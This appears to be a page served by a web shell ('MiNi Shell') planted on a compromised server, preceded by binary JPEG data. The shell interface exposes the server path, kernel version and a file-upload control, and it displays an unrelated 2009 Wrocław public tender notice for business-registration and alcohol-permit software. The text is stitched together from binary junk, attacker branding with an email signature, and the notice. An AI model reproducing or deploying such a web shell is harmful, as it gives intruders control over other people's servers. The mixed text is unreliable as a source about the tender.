JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090401/87004-N-2009.html

<p class="kh_header"><b>Wrocław: Dostawę licencji i wdrożenie systemu wspomagającego ewidencjonowanie zgłoszeń dotyczących prowadzenia działalności gospodarczej oraz systemu do wspomagania obsługi zezwoleń na sprzedaż napojów alkoholowych.</b><br>
<b>Numer ogłoszenia: 87004 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wrocław Urząd Miejski Wrocławia , pl. Nowy Targ 1/8, 50-141 Wrocław, woj. dolnośląskie, tel. 071 7779230, 7779231, faks 071 7779229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę licencji i wdrożenie systemu wspomagającego ewidencjonowanie zgłoszeń dotyczących prowadzenia działalności gospodarczej oraz systemu do wspomagania obsługi zezwoleń na sprzedaż napojów alkoholowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
a.	Dostawa oprogramowania do prowadzenia ewidencji informacji o podmiotach gospodarczych i udzieleniu, w zależności od przyjętej przez Wykonawcę zasady licencjonowania, 16 licencji stanowiskowych na dostarczone oprogramowanie oraz dodatkowo jednej licencji dla administratora systemu lub licencji na nieograniczoną ilość użytkowników (jeśli Wykonawca udziela licencji na firmę).
b.	Dostawa oprogramowania do prowadzenia ewidencji wniosków i zezwoleń na sprzedaż napojów alkoholowych (dalej zwanego systemem ALKOHOLE) i udzieleniu, w zależności od przyjętej przez Wykonawcę zasady licencjonowania, 10 licencji stanowiskowych na dostarczone oprogramowanie oraz dodatkowo jednej licencji dla administratora systemu lub licencji na nieograniczoną ilość użytkowników (jeśli Wykonawca udziela licencji na firmę).
Wykonawca winien w Formularzu oferty podać formę realizacji przedmiotu zamówienia, poprzez dookreślenie czy oferuje wymaganą ilości licencji stanowiskowych wymienionych powyżej oprogramowań, czy też nieograniczoną liczbę licencji.
Szczegółowe warunki licencji oprogramowania zawarte są w Projekcie umowy. 
Wszystkie wymogi (prawne, technologiczne, funkcjonalne, inne), cechy użytkowe oprogramowania oraz warunki integracji oraz implementacji z innymi bazami danych i systemami zawiera Projekt umowy.
2. Szczegółowy zakres rzeczowy zamówienia obejmuje:
-	wdrożenie oprogramowania o którym mowa w punkcie 1. Zakres prac wdrożeniowych oraz harmonogram ich realizacji określony jest w Projekcie umowy. Zamawiający wymaga, aby Wykonawcy wraz ze złożoną ofertą przedłożyli wypełniony harmonogram wdrożenia systemu,
-	przeszkolenie pracowników Zamawiającego w ramach wdrażanych systemów. Szczegółowy zakres prac szkoleniowych, 
-	świadczenie usług serwisowych w zakresie wdrożonych systemów wymienionych w punkcie 1 w ramach udzielonej gwarancji oraz opieki powdrożeniowej w zakresie aktualizacji oprogramowania wraz ze świadczeniem usług asysty technicznej w okresie - od dnia odbioru końcowego każdego z wdrożonych systemów do dnia 31.03.2010 r.  
3. Szczegółowy opis przedmiotu zamówienia oraz zasady realizacji zamówienia zostały zawarte w Projekcie umowy.
4. Wykonawca zobowiązany jest do przedłożenia wraz z ofertą informacji, dotyczących minimalnych wymagań niezbędnych do zapewnienia prawidłowej pracy dostarczonych systemów, odnośnie udostępnionego przez Zamawiającego serwera - typ procesora, ilość procesorów, wielkość RAM, wielkość obszaru pamięci na dane..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.42.20.00-2, 80.53.31.00-0, 72.26.30.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest do wniesienia wadium w wysokości 5.000,00 PLN  (słownie: pięć tysięcy złotych 00/100).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.	Spełniają warunki określone w przepisie art. 22 ust. 1 ustawy Pzp;
2.	Zrealizowali z należytą starannością, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie), co najmniej trzy dostawy, z których każda jednocześnie obejmowała:
-	dostawę oprogramowania do prowadzenia ewidencji informacji o podmiotach gospodarczych,
-	dostawę oprogramowania do prowadzenia ewidencji wniosków i zezwoleń na sprzedaż napojów alkoholowych,
-	wdrożenie obejmujące: 
.	dostosowanie oprogramowania do wymogów Zamawiającego, 
.	zintegrowanie dostarczanego oprogramowania z systemem ewidencji ludności co najmniej w zakresie pobierania z niego podstawowych danych o osobie (nazwisko, nazwisko rodowe,  nazwisko z poprzedniego małżeństwa, imiona, data urodzenia, adres stały i czasowy, dane dowodu tożsamości, obywatelstwo) i umożliwienia ich wczytania do baz integrowanego oprogramowania,
.	migrację danych, 
.	przeszkolenie minimum 15 użytkowników, 
.	świadczenie usług serwisowych w zakresie wdrożonych systemów w ramach udzielonej gwarancji oraz opieki powdrożeniowej w zakresie aktualizacji oprogramowania wraz ze  świadczeniem usług asysty technicznej,
i były one realizowane na rzecz co najmniej dwóch gmin o liczbie mieszkańców powyżej 30.000 i co najmniej jednej gminy o liczbie mieszkańców powyżej 100.000. Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie dostaw wymienionych w ww. wykazie.
3. Posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 100.000 PLN lub w wysokości równoważnej dla walut obcych - liczonej wg średniego kursu NBP na dzień zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych. 
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu:
Na potwierdzenie spełnienia wyżej wymienionych warunków Wykonawca dołączy do oferty oświadczenia i dokumenty wymienione poniżej. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana według formuły: spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych poniżej. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla udokumentowania spełnienia wymaganych warunków udziału w postępowaniu, do formularza oferty Wykonawcy dołączą następujące dokumenty:
- w formie oryginału:
 1.   Oświadczenie złożone zgodnie z art. 22 ust. 1 ustawy Pzp.
- w formie oryginału lub kopii poświadczonej-za zgodność  z oryginałem-przez Wykonawcę (zgodnie z § 4 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19.05. 2006 r. w sprawie dokumentów jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane):
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4.	Wykaz wykonanych, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw potwierdzających spełnianie warunku, o którym mowa powyżej. Wykaz winien składać się z następujących elementów: przedmiot (podać zakres); wartość brutto; daty wykonania (rozpoczęcia i zakończenia - dzień, miesiąc, rok); nazwę i adres Odbiorcy. 
5.	Dokumenty potwierdzające, że dostawy o których mowa w punkcie 4 niniejszego działu zostały wykonane należycie;
6.	Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Informacja winna potwierdzać posiadanie środków finansowych lub zdolności kredytowej w wysokości co najmniej 100.000 PLN lub równoważnej dla walut obcych - liczonej wg średniego kursu NBP na dzień zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych.
A)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o którym mowa w pkt 2 i 3 niniejszego działu składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
-	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
B)	Dokument, o którym mowa w pkt 2 niniejszego działu powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
C)	Dokument, o którym mowa w pkt 3 niniejszego działu powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
D)	Jeżeli w kraju pochodzenia lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt A), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy pkt B) i C) stosuje się odpowiednio. 

Uwaga - dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
Odpis (zaświadczenie), o którym mowa w pkt. 2 niniejszego działu, musi zawierać aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy. 
WYKONAWCY UBIEGAJĄCY SIĘ WSPÓLNIE O ZAMÓWIENIE:
1)	Oświadczenie wymienione w pkt. 1 niniejszego działu, Wykonawcy mogą złożyć wspólnie (podpisane przez Pełnomocnika lub każdego z Wykonawców odrębnie).     
2)	Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązany jest złożyć samodzielnie - dokumenty wymienione w pkt 2 i 3 niniejszego działu.
3)	Wszyscy Wykonawcy ubiegający się o udzielenie zamówienia, mogą złożyć wspólnie dokumenty i oświadczenia wymienione w pkt 4 i 5 niniejszego działu(spełnianie warunku będzie oceniane łącznie).
4)	Dokument wymieniony w pkt. 6 niniejszego działu może być złożony przez jednego członka konsorcjum lub przez każdego odrębnie. Spełnianie warunku będzie oceniane łącznie.
5)	W Formularzu oferty  w części dotyczącej wskazania Wykonawcy i 
      dotyczących go danych (m.in. danych adresowych) - należy wpisać wszystkich Wykonawców i wszystkie dotyczące ich dane (m.in. dane adresowe).
5)  Do oferty musi być załączone - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wroclaw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Wrocławia - Wydział Zamówień Publicznych
al. M. Kromera 44, 51-163 Wrocław.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2009 godzina 09:00, miejsce: Urząd Miejski Wrocławia
Wydział Zamówień Publicznych,
51-163 Wrocław
al. M. Kromera 44
pok. 239 (II piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com